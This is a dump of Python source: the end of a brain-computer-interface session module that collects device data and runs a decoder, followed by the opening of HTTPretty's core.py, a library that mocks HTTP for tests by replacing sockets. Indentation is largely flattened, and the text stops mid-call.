data = load(self.filepath)
decoder = BCIDecoder()
decoderpath = self.decoderpath
# Train decoder
decoder.fit(data)
# Save decoder
decoder.save_model(decoderpath)
self.decoder = decoder
logger.info(f'Saved the decoder to {decoderpath}')
class ActiveSession(object):
    ''' The active session.
    1. Automatically collects data;
    2. Computes labels periodically;
    3. Saves the data when stopped.
    '''
def __init__(self, filepath, decoderpath, interval, send):
''' Initialize the active module,
Args:
- @filepath: The path of the file to be stored;
- @decoderpath: The path of the decoder;
            - @interval: The interval (in seconds) of the periodic job;
- @send: The sending method.
'''
# Necessary parameters
self.filepath = filepath
self.interval = interval
# Start collecting data
self.ds = DataStack(filepath)
self.ds.start()
# Load the decoder
self.load_decoder(decoderpath)
self.timely_job(send)
self.stopped = False
logger.debug(
f'Active module starts as {filepath}, {decoderpath}, {interval}')
def load_decoder(self, decoderpath):
# Load decoder
self.decoder = BCIDecoder()
self.decoder.load_model(decoderpath)
logger.debug(f'Loaded decoder of "{decoderpath}"')
def _keep_active(self, send):
logger.debug(f'Active module timely job starts.')
while self.state == 'alive':
time.sleep(self.interval)
# Get data
d = self.ds.latest()
logger.debug(
f'Got the latest data from device, shape is {d.shape}')
if d.shape[1] < 4000:
logger.warning(
                    f'Not enough data to compute the label, doing nothing')
continue
# Compute label
d[-1] = 0
d[-1, -1] = 33
d[-1, 0] = 22
label = self.decoder.predict(d)
logger.debug(f'Computed label of {label}')
out = dict(
method='labelComputed',
label=f'{label}'
)
send(out)
logger.debug(f'Active module timely job stops.')
def timely_job(self, send):
''' The timely job method
Args:
- @handler: The handler on time.
'''
self.state = 'alive'
thread = threading.Thread(target=self._keep_active, args=(send,))
        thread.daemon = True
thread.start()
def receive(self, dct):
logger.debug(f'Active module received {dct}')
method = dct.get('method', None)
name = dct.get('sessionName', None)
if method == 'stopSession' and name == 'wubiaoqian':
# Stop active session,
# 1. Stop collecting data;
# 2. Save the data to the disk
self.state = 'stopped'
self.stopped = True
self.ds.stop()
self.ds.save()
self.ds.close()
logger.debug(f'Active module stopped.')
return 0, dict(
method='sessionStopped',
sessionName='wubiaoqian',
)
return 1, dict(
method='error',
reason='invalidMessage',
raw='',
comment=f'Active module failed to parse {dct}'
)
class PassiveSession(object):
    ''' The passive session.
    1. Automatically collects data;
    2. Computes labels on request;
    3. Saves the data when stopped.
    '''
def __init__(self, filepath, decoderpath, updatedecoderpath, update_count, send):
''' Initialize the passive module,
Args:
- @filepath: The path of the file to be stored;
- @decoderpath: The path of the decoder;
- @updatedecoderpath: The path of the updated decoder;
            - @update_count: The number of trials used to update the decoder;
- @send: The sending method.
'''
# Necessary parameters
self.filepath = filepath
self.updatedecoderpath = updatedecoderpath
# Start collecting data
self.ds = DataStack(filepath,
autoDetectLabelFlag=True,
predict=self.predict)
self.ds.start()
# Load the decoder
self.load_decoder(decoderpath, update_count)
self.send = send
self.results = []
self.stopped = False
logger.debug(
f'Passive module starts as {filepath}, {decoderpath}, {update_count}')
def load_decoder(self, decoderpath, update_count):
# Load decoder
self.decoder = BCIDecoder(update_count)
self.decoder.load_model(decoderpath)
logger.debug(f'Loaded decoder of "{decoderpath}"')
def save_updatedecoder(self):
# Save the updated decoder
path = self.updatedecoderpath
self.decoder.save_model(path)
logger.info(f'Saved the updated decoder to {path}')
    def predict(self):
        try:
            d = self.ds.latest()
            label = self.decoder.predict(d)
            # The true label is only known when the marker 11 or 22 is present
            true_label = None
            if 11 in d[-1, :]:
                true_label = 0
                logger.debug(f'True label: {true_label}')
            if 22 in d[-1, :]:
                true_label = 1
                logger.debug(f'True label: {true_label}')
            logger.debug(f'Predicted label: {label}')
            self.send(dict(
                method='labelComputed',
                label=f'{label}'
            ))
            if true_label is not None:
                self.results.append([true_label, label])
        except Exception:
            err = traceback.format_exc()
            logger.warning(f'Failed on predict: {err}')
def receive(self, dct):
logger.debug(f'Passive module received {dct}')
method = dct.get('method', None)
name = dct.get('sessionName', None)
if method == 'stopSession' and name == 'youbiaoqian':
# Stop passive session,
# 1. Stop collecting data;
# 2. Save the data to the disk
self.stopped = True
self.ds.stop()
self.ds.save()
self.ds.close()
self.save_updatedecoder()
logger.debug(f'Passive module stopped.')
c = 0
n = 0
for t, p in self.results:
n += 1
if t == 1 and p == 1:
c += 1
if t == 0 and p == 0:
c += 1
            accuracy = c / n if n else 0.0
return 0, dict(
method='sessionStopped',
sessionName='youbiaoqian',
accuracy=f'{accuracy}'
)
return 1, dict(
method='error',
reason='invalidMessage',
raw='',
comment=f'Passive module failed to parse {dct}'
)
|
core.py
|
# <HTTPretty - HTTP client mock for Python>
# Copyright (C) <2011-2020> Gabriel Falcão <gabriel@nacaolivre.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import io
import codecs
import contextlib
import functools
import hashlib
import inspect
import logging
import itertools
import json
import types
import re
import socket
import tempfile
import threading
import traceback
import warnings
from functools import partial
from typing import Callable
from .compat import (
BaseClass,
BaseHTTPRequestHandler,
quote,
quote_plus,
urlencode,
encode_obj,
urlunsplit,
urlsplit,
parse_qs,
unquote_utf8,
)
from .http import (
STATUSES,
HttpBaseClass,
parse_requestline,
last_requestline,
)
from .utils import (
utf8,
decode_utf8,
)
from .errors import HTTPrettyError, UnmockedError
from datetime import datetime
from datetime import timedelta
from errno import EAGAIN
old_socket = socket.socket
old_SocketType = socket.SocketType
old_create_connection = socket.create_connection
old_gethostbyname = socket.gethostbyname
old_gethostname = socket.gethostname
old_getaddrinfo = socket.getaddrinfo
old_socksocket = None
old_ssl_wrap_socket = None
old_sslwrap_simple = None
old_sslsocket = None
old_sslcontext_wrap_socket = None
old_sslcontext = None
MULTILINE_ANY_REGEX = re.compile(r'.*', re.M)
hostname_re = re.compile(r'\^?(?:https?://)?[^:/]*[:/]?')
logger = logging.getLogger(__name__)
try: # pragma: no cover
import socks
old_socksocket = socks.socksocket
except ImportError:
socks = None
try: # pragma: no cover
import ssl
old_sslcontext_class = ssl.SSLContext
old_sslcontext = ssl.create_default_context()
old_ssl_wrap_socket = old_sslcontext.wrap_socket
try:
old_sslcontext_wrap_socket = ssl.SSLContext.wrap_socket
except AttributeError:
pass
old_sslsocket = ssl.SSLSocket
except ImportError: # pragma: no cover
ssl = None
try:
import _ssl
except ImportError:
_ssl = None
# used to handle error caused by ndg-httpsclient
try:
from requests.packages.urllib3.contrib.pyopenssl import inject_into_urllib3, extract_from_urllib3
pyopenssl_override = True
except Exception:
pyopenssl_override = False
try:
import requests.packages.urllib3.connection as requests_urllib3_connection
old_requests_ssl_wrap_socket = requests_urllib3_connection.ssl_wrap_socket
except ImportError:
requests_urllib3_connection = None
old_requests_ssl_wrap_socket = None
try:
import eventlet
import eventlet.green
except ImportError:
eventlet = None
DEFAULT_HTTP_PORTS = frozenset([80])
POTENTIAL_HTTP_PORTS = set(DEFAULT_HTTP_PORTS)
DEFAULT_HTTPS_PORTS = frozenset([443])
POTENTIAL_HTTPS_PORTS = set(DEFAULT_HTTPS_PORTS)
def FALLBACK_FUNCTION(x):
return x
class HTTPrettyRequest(BaseHTTPRequestHandler, BaseClass):
r"""
    Represents an HTTP request. It takes a valid multi-line,
    ``\r\n`` separated string with HTTP headers and parses them out using
    the internal `parse_request` method.
It also replaces the `rfile` and `wfile` attributes with :py:class:`io.BytesIO`
instances so that we guarantee that it won't make any I/O, neither
for writing nor reading.
It has some convenience attributes:
    ``headers`` -> a mimetype object that can be cast into a dictionary and
    contains all the request headers
    ``method`` -> the HTTP method used in this request
    ``querystring`` -> a dictionary mapping query-string keys to lists of
    values. Note that if you need a single value from the query string you
    will have to index into the list manually, as shown below.
    ``body`` -> the request body as a string
    ``parsed_body`` -> the request body parsed by ``parse_request_body``
    .. testcode::
       >>> request.querystring
       {'name': ['Gabriel Falcao']}
       >>> print(request.querystring['name'][0])
       Gabriel Falcao
    """
def __init__(self, headers, body=''):
# first of all, lets make sure that if headers or body are
# unicode strings, it must be converted into a utf-8 encoded
# byte string
self.raw_headers = utf8(headers.strip())
self._body = utf8(body)
# Now let's concatenate the headers with the body, and create
# `rfile` based on it
self.rfile = io.BytesIO(b'\r\n\r\n'.join([self.raw_headers, self.body]))
# Creating `wfile` as an empty BytesIO, just to avoid any
# real I/O calls
self.wfile = io.BytesIO()
# parsing the request line preemptively
self.raw_requestline = self.rfile.readline()
# initiating the error attributes with None
self.error_code = None
self.error_message = None
# Parse the request based on the attributes above
if not self.parse_request():
return
# making the HTTP method string available as the command
self.method = self.command
# Now 2 convenient attributes for the HTTPretty API:
# `querystring` holds a dictionary with the parsed query string
try:
self.path = self.path.encode('iso-8859-1')
except UnicodeDecodeError:
pass
self.path = decode_utf8(self.path)
qstring = self.path.split("?", 1)[-1]
self.querystring = self.parse_querystring(qstring)
# And the body will be attempted to be parsed as
# `application/json` or `application/x-www-form-urlencoded`
"""a dictionary containing parsed request body or None if
HTTPrettyRequest doesn't know how to parse it. It currently
supports parsing body data that was sent under the
``content`-type` headers values: ``application/json`` or
``application/x-www-form-urlencoded``
"""
self.parsed_body = self.parse_request_body(self._body)
@property
def body(self):
return self._body
@body.setter
def body(self, value):
self._body = utf8(value)
# And the body will be attempted to be parsed as
# `application/json` or `application/x-www-form-urlencoded`
self.parsed_body = self.parse_request_body(self._body)
def __nonzero__(self):
return bool(self.body) or bool(self.raw_headers)
def __str__(self):
tmpl = '<HTTPrettyRequest("{}", total_headers={}, body_length={})>'
return tmpl.format(
self.headers.get('content-type', ''),
len(self.headers),
len(self.body),
)
def parse_querystring(self, qs):
"""parses an UTF-8 encoded query string into a dict of string lists
:param qs: a querystring
:returns: a dict of lists
"""
expanded = unquote_utf8(qs)
parsed = parse_qs(expanded)
result = {}
for k in parsed:
result[k] = list(map(decode_utf8, parsed[k]))
return result
def parse_request_body(self, body):
"""Attempt to parse the post based on the content-type passed.
Return the regular body if not
:param body: string
:returns: a python object such as dict or list in case the deserialization suceeded. Else returns the given param ``body``
"""
PARSING_FUNCTIONS = {
'application/json': json.loads,
'text/json': json.loads,
'application/x-www-form-urlencoded': self.parse_querystring,
}
content_type = self.headers.get('content-type', '')
do_parse = PARSING_FUNCTIONS.get(content_type, FALLBACK_FUNCTION)
try:
body = decode_utf8(body)
return do_parse(body)
except Exception:
return body
class EmptyRequestHeaders(dict):
"""A dict subclass used as internal representation of empty request
headers
"""
class HTTPrettyRequestEmpty(object):
"""Represents an empty :py:class:`~httpretty.core.HTTPrettyRequest`
where all its properties are somehow empty or ``None``
"""
method = None
url = None
body = ''
headers = EmptyRequestHeaders()
class FakeSockFile(object):
"""Fake socket file descriptor. Under the hood all data is written in
a temporary file, giving it a real file descriptor number.
"""
def __init__(self):
self.file = tempfile.TemporaryFile()
self._fileno = self.file.fileno()
def getvalue(self):
if hasattr(self.file, 'getvalue'):
return self.file.getvalue()
else:
return self.file.read()
def close(self):
self.socket.close()
self.file.close()
def fileno(self):
return self._fileno
def __getattr__(self, name):
return getattr(self.file, name)
def __del__(self):
try:
self.close()
except (ValueError, AttributeError):
pass
class FakeSSLSocket(object):
"""Shorthand for :py:class:`~httpretty.core.fakesock`
"""
def __init__(self, sock, *args, **kw):
self._httpretty_sock = sock
def __getattr__(self, attr):
return getattr(self._httpretty_sock, attr)
class FakeAddressTuple(object):
def __init__(self, fakesocket):
self.fakesocket = fakesocket
def __getitem__(self, *args, **kw):
raise AssertionError('socket {} is not connected'.format(self.fakesocket.truesock))
class fakesock(object):
"""
fake :py:mod:`socket`
"""
class socket(object):
"""drop-in replacement for :py:class:`socket.socket`
"""
_entry = None
debuglevel = 0
_sent_data = []
def __init__(
self,
family=socket.AF_INET,
type=socket.SOCK_STREAM,
proto=0,
fileno=None
):
self.socket_family = family
self.socket_type = type
self.socket_proto = proto
if httpretty.allow_net_connect:
self.truesock = self.create_socket()
else:
self.truesock = None
self._address = FakeAddressTuple(self)
self.__truesock_is_connected__ = False
self.fd = FakeSockFile()
self.fd.socket = fileno or self
self.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
self._sock = fileno or self
self.is_http = False
self._bufsize = 32 * 1024
def create_socket(self):
return old_socket(self.socket_family, self.socket_type, self.socket_proto)
def getpeercert(self, *a, **kw):
now = datetime.now()
shift = now + timedelta(days=30 * 12)
return {
'notAfter': shift.strftime('%b %d %H:%M:%S GMT'),
'subjectAltName': (
('DNS', '*.%s' % self._host),
('DNS', self._host),
('DNS', '*'),
),
'subject': (
(
('organizationName', '*.%s' % self._host),
),
(
('organizationalUnitName',
'Domain Control Validated'),
),
(
('commonName', '*.%s' % self._host),
),
),
}
def ssl(self, sock, *args, **kw):
return sock
def setsockopt(self, level, optname, value):
if httpretty.allow_net_connect and not self.truesock:
self.truesock = self.create_socket()
elif not self.truesock:
logger.debug('setsockopt(%s, %s, %s) failed', level, optname, value)
return
return self.truesock.setsockopt(level, optname, value)
def connect(self, address):
try:
self._address = (self._host, self._port) = address
except ValueError:
# We get here when the address is just a string pointing to a
# unix socket path/file
#
# See issue #206
self.is_http = False
else:
ports_to_check = (
POTENTIAL_HTTP_PORTS.union(POTENTIAL_HTTPS_PORTS))
self.is_http = self._port in ports_to_check
if not self.is_http:
self.connect_truesock()
elif self.truesock and not self.__truesock_is_connected__:
# TODO: remove nested if
matcher = httpretty.match_http_address(self._host, self._port)
if matcher is None:
self.connect_truesock()
def bind(self, address):
self._address = (self._host, self._port) = address
if self.truesock:
self.bind_truesock(address)
def bind_truesock(self, address):
if httpretty.allow_net_connect and not self.truesock:
self.truesock = self.create_socket()
elif not self.truesock:
raise UnmockedError()
return self.truesock.bind(address)
def connect_truesock(self):
if httpretty.allow_net_connect and not self.truesock:
self.truesock = self.create_socket()
elif not self.truesock:
raise UnmockedError()
if self.__truesock_is_connected__:
return self.truesock
with restored_libs():
hostname = self._address[0]
port = 80
if len(self._address) == 2:
port = self._address[1]
if port == 443 and old_sslsocket:
self.truesock = old_ssl_wrap_socket(self.truesock, server_hostname=hostname)
sock = self.truesock
sock.connect(self._address)
self.__truesock_is_connected__ = True
self.truesock = sock
return self.truesock
def real_socket_is_connected(self):
return self.__truesock_is_connected__
def fileno(self):
if self.truesock:
return self.truesock.fileno()
return self.fd.fileno()
def close(self):
if self.truesock:
self.truesock.close()
self.truesock = None
self.__truesock_is_connected__ = False
def makefile(self, mode='r', bufsize=-1):
"""Returns this fake socket's own tempfile buffer.
If there is an entry associated with the socket, the file
descriptor gets filled in with the entry data before being
returned.
"""
self._mode = mode
self._bufsize = bufsize
if self._entry:
t = threading.Thread(
target=self._entry.fill_filekind, args=(self.fd,)
)
t.start()
if self.timeout == socket._GLOBAL_DEFAULT_TIMEOUT:
timeout = None
else:
timeout = self.timeout
t.join(timeout)
if t.is_alive():
raise socket.timeout
return self.fd
def real_sendall(self, data, *args, **kw):
"""Sends data to the remote server. This method is called
when HTTPretty identifies that someone is trying to send
non-http data.
The received bytes are written in this socket's tempfile
buffer so that HTTPretty can return it accordingly when
necessary.
"""
if httpretty.allow_net_connect and not self.truesock:
self.connect_truesock()
elif not self.truesock:
raise UnmockedError()
if not self.is_http:
self.truesock.setblocking(1)
return self.truesock.sendall(data, *args, **kw)
sock = self.connect_truesock()
sock.setblocking(1)
sock.sendall(data, *args, **kw)
should_continue = True
while should_continue:
try:
received = sock.recv(self._bufsize)
self.fd.write(received)
should_continue = bool(received.strip())
except socket.error as e:
if e.errno == EAGAIN:
continue
break
self.fd.seek(0)
def sendall(self, data, *args, **kw):
# if self.__truesock_is_connected__:
# return self.truesock.sendall(data, *args, **kw)
self._sent_data.append(data)
self.fd = FakeSockFile()
self.fd.socket = self
if isinstance(data, str):
data = data.encode('utf-8')
elif not isinstance(data, bytes):
                logger.debug(f'cannot sendall({data!r})')
data = bytes(data)
try:
requestline, _ = data.split(b'\r\n', 1)
method, path, version = parse_requestline(
decode_utf8(requestline))
is_parsing_headers = True
except ValueError:
path = ''
is_parsing_headers = False
if self._entry is None:
# If the previous request wasn't mocked, don't
# mock the subsequent sending of data
return self.real_sendall(data, *args, **kw)
else:
method = self._entry.method
path = self._entry.info.path
self.fd.seek(0)
if not is_parsing_headers:
if len(self._sent_data) > 1:
headers = utf8(last_requestline(self._sent_data))
meta = self._entry.request.headers
body = utf8(self._sent_data[-1])
if meta.get('transfer-encoding', '') == 'chunked':
if not body.isdigit() and (body != b'\r\n') and (body != b'0\r\n\r\n'):
self._entry.request.body += body
else:
self._entry.request.body += body
httpretty.historify_request(headers, body, False)
return
if path[:2] == '//':
                path = 'http:' + path
            # path might come scheme-relative (e.g. '//host/path'); add a
            # scheme so urlsplit() can extract the host and port below
s = urlsplit(path)
POTENTIAL_HTTP_PORTS.add(int(s.port or 80))
parts = list(map(utf8, data.split(b'\r\n\r\n', 1)))
if len(parts) == 2:
headers, body = parts
else:
headers = ''
body = data
request = httpretty.historify_request(headers, body)
info = URIInfo(
hostname=self._host,
port=self._port,
path=s.path,
query=s.query,
last_request=request
)
matcher, entries = httpretty.match_uriinfo(info)
if not entries:
self._entry = None
self.real_sendall(data)
return
self._entry = matcher.get_next_entry(method, info, request)
def forward_and_trace(self, function_name, *a, **kw):
if self.truesock and not self.__truesock_is_connected__:
self.truesock = self.create_socket()
### self.connect_truesock()
if self.__truesock_is_connected__:
function = getattr(self.truesock, function_name)
if self.is_http:
if self.truesock and not self.__truesock_is_connected__:
self.truesock = self.create_socket()
### self.connect_truesock()
if not self.truesock:
raise UnmockedError()
callback = getattr(self.truesock, function_name)
return callback(*a, **kw)
def settimeout(self, new_timeout):
self.timeout = new_timeout
if not self.is_http:
if self.truesock:
self.truesock.settimeout(new_timeout)
def send(self, *args, **kwargs):
return self.forward_and_trace('send', *args, **kwargs)
def sendto(self, *args, **kwargs):
return self.forward_and_trace('sendto', *args, **kwargs)
def recvfrom_into(self, *args, **kwargs):
return self.forward_and_trace('recvfrom_into', *args, **kwargs)
def recv_into(self, *args, **kwargs):
if self.truesock and not self.__truesock_is_connected__:
self.connect_truesock()
return self.forward_and_trace('recv_into', *args, **kwargs)
def recvfrom(self, *args, **kwargs):
if self.truesock and not self.__truesock_is_connected__:
self.connect_truesock()
return self.forward_and_trace('recvfrom', *args, **kwargs)
def recv(self, buffersize=None, *args, **kwargs):
if self.truesock and not self.__truesock_is_connected__:
self.connect_truesock()
buffersize = buffersize or self._bufsize
return self.forward_and_trace('recv', buffersize, *args, **kwargs)
def __getattr__(self, name):
if httpretty.allow_net_connect and not self.truesock:
# can't call self.connect_truesock() here because we
# don't know if user wants to execute server of client
# calls (or can they?)
self.truesock = self.create_socket()
elif not self.truesock:
raise UnmockedError()
return getattr(self.truesock, name)
def fake_wrap_socket(orig_wrap_socket_fn, *args, **kw):
"""drop-in replacement for py:func:`ssl.wrap_socket`
"""
server_hostname = kw.get('server_hostname')
if server_hostname is not None:
matcher = httpretty.match_https_hostname(server_hostname)
if matcher is None:
return orig_wrap_socket_fn(*args, **kw)
if 'sock' in kw:
return kw['sock']
else:
return args[0]
def create_fake_connection(
address,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""drop-in replacement for :py:func:`socket.create_connection`"""
s = fakesock.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
s.settimeout(timeout)
if isinstance(source_address, tuple) and len(source_address) == 2:
        # tuples are immutable, so rebuild it with the port cast to int
        source_address = (source_address[0], int(source_address[1]))
if source_address:
s.bind(source_address)
s.connect(address)
return s
def fake_gethostbyname(host):
"""drop-in replacement for :py:func:`socket.gethostbyname`"""
return '127.0.0.1'
def fake_gethostname():
"""drop-in replacement for :py:func:`socket.gethostname`"""
return 'localhost'
def fake_getaddrinfo(
host, port, family=None, socktype=None, proto=None, flags=None):
"""drop-in replacement for :py:func:`socket.getaddrinfo`"""
return [(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
'', (host, port)),
(socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_TCP,
'', (host, port))]
class Entry(BaseClass):
"""Created by :py:meth:`~httpretty.core.httpretty.register_uri` and
stored in memory as internal representation of a HTTP
request/response definition.
Args:
method (str): One of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``.
uri (str|re.Pattern): The URL to match
adding_headers (dict): Extra headers to be added to the response
forcing_headers (dict): Overwrite response headers.
status (int): The status code for the response, defaults to ``200``.
streaming (bool): Whether should stream the response into chunks via generator.
headers: Headers to inject in the faked response.
Returns:
httpretty.Entry: containing the request-matching metadata.
.. warning:: When using the ``forcing_headers`` option make sure to add the header ``Content-Length`` to match at most the total body length, otherwise some HTTP clients can hang indefinitely.
"""
def __init__(self, method, uri, body,
adding_headers=None,
forcing_headers=None,
status=200,
streaming=False,
**headers):
self.method = method
self.uri = uri
self.info = None
self.request = None
self.body_is_callable = False
if hasattr(body, "__call__"):
self.callable_body = body
self.body = None
self.body_is_callable = True
elif isinstance(body, str):
self.body = utf8(body)
else:
self.body = body
self.streaming = streaming
if not streaming and not self.body_is_callable:
self.body_length = len(self.body or '')
else:
self.body_length = 0
self.adding_headers = adding_headers or {}
self.forcing_headers = forcing_headers or {}
self.status = int(status)
for k, v in headers.items():
name = "-".join(k.split("_")).title()
self.adding_headers[name] = v
self.validate()
def validate(self):
"""validates the body size with the value of the ``Content-Length``
header
"""
content_length_keys = 'Content-Length', 'content-length'
for key in content_length_keys:
got = self.adding_headers.get(
key, self.forcing_headers.get(key, None))
if got is None:
continue
igot = None
try:
igot = int(got)
except (ValueError, TypeError):
warnings.warn(
'HTTPretty got to register the Content-Length header '
'with "%r" which is not a number' % got)
return
if igot and igot > self.body_length:
raise HTTPrettyError(
'HTTPretty got inconsistent parameters. The header '
'Content-Length you registered expects size "%d" but '
'the body you registered for that has actually length '
'"%d".' % (
igot, self.body_length,
)
)
def __str__(self):
return r'<Entry {} {} getting {}>'.format(
self.method,
self.uri,
self.status
)
def normalize_headers(self, headers):
"""Normalize keys in header names so that ``COntent-tyPe`` becomes ``content-type``
:param headers: dict
:returns: dict
"""
new = {}
for k in headers:
new_k = '-'.join([s.lower() for s in k.split('-')])
new[new_k] = headers[k]
return new
def fill_filekind(self, fk):
"""writes HTTP Response data to a file descriptor
        :param fk: a file-like object
.. warning:: **side-effect:** this method moves the cursor of the given file object to zero
"""
now = datetime.utcnow()
headers = {
'status': self.status,
'date': now.strftime('%a, %d %b %Y %H:%M:%S GMT'),
'server': 'Python/HTTPretty',
'connection': 'close',
}
if self.forcing_headers:
headers = self.forcing_headers
if self.adding_headers:
headers.update(
self.normalize_headers(
self.adding_headers))
headers = self.normalize_headers(headers)
status = headers.get('status', self.status)
if self.body_is_callable:
status, headers, self.body = self.callable_body(self.request, self.info.full_url(), headers)
headers = self.normalize_headers(headers)
# TODO: document this behavior:
if 'content-length' not in headers:
headers.update({
'content-length': len(self.body)
})
string_list = [
'HTTP/1.1 %d %s' % (status, STATUSES[status]),
]
if 'date' in headers:
string_list.append('date: %s' % headers.pop('date'))
if not self.forcing_headers:
content_type = headers.pop('content-type',
'text/plain; charset=utf-8')
content_length = headers.pop('content-length',
self.body_length)
string_list.append('content-type: %s' % content_type)
if not self.streaming:
string_list.append('content-length: %s' % content_length)
server = headers.pop('server', None)
if server:
string_list.append('server: %s' % server)
for k, v in headers.items():
string_list.append(
'{}: {}'.format(k, v),
)
for item in string_list:
fk.write(utf8(item) + b'\n')
fk.write(b'\r\n')
if self.streaming:
self.body, body = itertools.tee(self.body)
for chunk in body:
fk.write(utf8(chunk))
else:
fk.write(utf8(self.body))
fk.seek(0)
def url_fix(s, charset=None):
"""escapes special characters
"""
if charset:
warnings.warn("{}.url_fix() charset argument is deprecated".format(__name__), DeprecationWarning)
scheme, netloc, path, querystring, fragment = urlsplit(s)
path = quote(path, b'/%')
querystring = quote_plus(querystring, b':&=')
return urlunsplit((scheme, netloc, path, querystring, fragment))
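# A small illustration of url_fix() under the quoting rules above
# (treat it as a sketch, not canonical output):
#
#   >>> url_fix('http://example.com/a path?q=hello world')
#   'http://example.com/a%20path?q=hello+world'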
class URIInfo(BaseClass):
"""Internal representation of `URIs <https://en.wikipedia.org/wiki/Uniform_Resource_Identifier>`_
.. tip:: all arguments are optional
:param username:
:param password:
:param hostname:
:param port:
:param path:
:param query:
:param fragment:
:param scheme:
:param last_request:
"""
default_str_attrs = (
'username',
'password',
'hostname',
'port',
'path',
)
def __init__(self,
username='',
password='',
hostname='',
port=80,
path='/',
query='',
fragment='',
scheme='',
last_request=None):
self.username = username or ''
self.password = password or ''
self.hostname = hostname or ''
if port:
port = int(port)
elif scheme == 'https':
port = 443
self.port = port or 80
self.path = path or ''
if query:
query_items = sorted(parse_qs(query).items())
self.query = urlencode(
encode_obj(query_items),
doseq=True,
)
else:
self.query = ''
if scheme:
self.scheme = scheme
elif self.port in POTENTIAL_HTTPS_PORTS:
self.scheme = 'https'
else:
self.scheme = 'http'
self.fragment = fragment or ''
self.last_request = last_request
def to_str(self, attrs):
fmt = ", ".join(['%s="%s"' % (k, getattr(self, k, '')) for k in attrs])
return r'<httpretty.URIInfo(%s)>' % fmt
def __str__(self):
return self.to_str(self.default_str_attrs)
def str_with_query(self):
attrs = self.default_str_attrs + ('query',)
return self.to_str(attrs)
def __hash__(self):
return int(hashlib.sha1(bytes(self, 'ascii')).hexdigest(), 16)
def __eq__(self, other):
self_tuple = (
self.port,
decode_utf8(self.hostname.lower()),
url_fix(decode_utf8(self.path)),
)
other_tuple = (
other.port,
decode_utf8(other.hostname.lower()),
url_fix(decode_utf8(other.path)),
)
return self_tuple == other_tuple
def full_url(self, use_querystring=True):
"""
:param use_querystring: bool
:returns: a string with the full url with the format ``{scheme}://{credentials}{domain}{path}{query}``
"""
credentials = ""
if self.password:
credentials = "{}:{}@".format(
self.username, self.password)
query = ""
if use_querystring and self.query:
query = "?{}".format(decode_utf8(self.query))
result = "{scheme}://{credentials}{domain}{path}{query}".format(
scheme=self.scheme,
credentials=credentials,
domain=self.get_full_domain(),
path=decode_utf8(self.path),
query=query
)
return result
def get_full_domain(self):
"""
:returns: a string in the form ``{domain}:{port}`` or just the domain if the port is 80 or 443
"""
hostname = decode_utf8(self.hostname)
# Port 80/443 should not be appended to the url
if self.port not in DEFAULT_HTTP_PORTS | DEFAULT_HTTPS_PORTS:
return ":".join([hostname, str(self.port)])
return hostname
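    # A short sketch of get_full_domain() (illustrative values):
    #
    #   >>> URIInfo(hostname='example.com', port=8080).get_full_domain()
    #   'example.com:8080'
    #
    # The default HTTP/HTTPS ports (80 and 443) are omitted, yielding just
    # 'example.com'.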
@classmethod
def from_uri(cls, uri, entry):
"""
:param uri: string
:param entry: an instance of :py:class:`~httpretty.core.Entry`
"""
result = urlsplit(uri)
if result.scheme == 'https':
POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
else:
POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
return cls(result.username,
result.password,
result.hostname,
result.port,
result.path,
result.query,
result.fragment,
result.scheme,
entry)
class URIMatcher(object):
regex = None
info = None
def __init__(self, uri, entries, match_querystring=False, priority=0):
self._match_querystring = match_querystring
# CPython, Jython
regex_types = ('SRE_Pattern', 'org.python.modules.sre.PatternObject',
'Pattern')
is_regex = type(uri).__name__ in regex_types
if is_regex:
self.regex = uri
result = urlsplit(uri.pattern)
if result.scheme == 'https':
POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
else:
POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
else:
self.info = URIInfo.from_uri(uri, entries)
self.entries = entries
self.priority = priority
self.uri = uri
# hash of current_entry pointers, per method.
self.current_entries = {}
def matches(self, info):
if self.info:
# Query string is not considered when comparing info objects, compare separately
return self.info == info and (not self._match_querystring or self.info.query == info.query)
else:
return self.regex.search(info.full_url(
use_querystring=self._match_querystring))
def __str__(self):
wrap = 'URLMatcher({})'
if self.info:
if self._match_querystring:
return wrap.format(str(self.info.str_with_query()))
else:
return wrap.format(str(self.info))
else:
return wrap.format(self.regex.pattern)
def get_next_entry(self, method, info, request):
"""Cycle through available responses, but only once.
Any subsequent requests will receive the last response"""
if method not in self.current_entries:
self.current_entries[method] = 0
# restrict selection to entries that match the requested
# method
entries_for_method = [e for e in self.entries if e.method == method]
if self.current_entries[method] >= len(entries_for_method):
self.current_entries[method] = -1
if not self.entries or not entries_for_method:
raise ValueError('I have no entries for method %s: %s'
% (method, self))
entry = entries_for_method[self.current_entries[method]]
if self.current_entries[method] != -1:
self.current_entries[method] += 1
# Create a copy of the original entry to make it thread-safe
body = entry.callable_body if entry.body_is_callable else entry.body
new_entry = Entry(entry.method, entry.uri, body,
status=entry.status,
streaming=entry.streaming,
adding_headers=entry.adding_headers,
